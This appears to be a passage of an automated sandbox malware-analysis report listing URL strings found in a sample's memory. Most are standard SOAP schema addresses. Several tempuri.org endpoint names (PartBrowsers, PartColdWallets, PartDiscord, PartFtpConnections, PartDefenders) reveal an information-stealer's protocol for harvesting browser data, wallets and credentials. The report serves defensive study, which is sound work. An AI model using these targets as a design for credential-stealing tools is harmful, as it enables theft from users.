                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/ReadOnly
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Rollback
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Volatile2PC
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContext
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContextResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/Register
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0N
                      Source: eYvT1lg5Dy.exeString found in binary or memory: http://ocsp.digicert.com0O
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438333852.0000000004FD8000.00000004.00000001.sdmpString found in binary or memory: http://s3-r-w.us-east-2.amazonaws.com
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438392427.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438259960.0000000004FCA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagews.com/crypted.exe
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity$
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Confirm
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponsel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponseD
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.438188355.0000000004FA6000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponsel
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/Init
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplay
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitDisplayResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/InitResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsers
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartBrowsersResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWallets
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartColdWalletsResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefenders
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDefendersResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDiscord
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartDiscordResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnections
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.440804678.0000000005462000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnectionsResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp, eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartHardwares
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartHardwaresResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsers
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsersResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwares
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437780252.0000000004F26000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguages
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.440804678.0000000005462000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponse
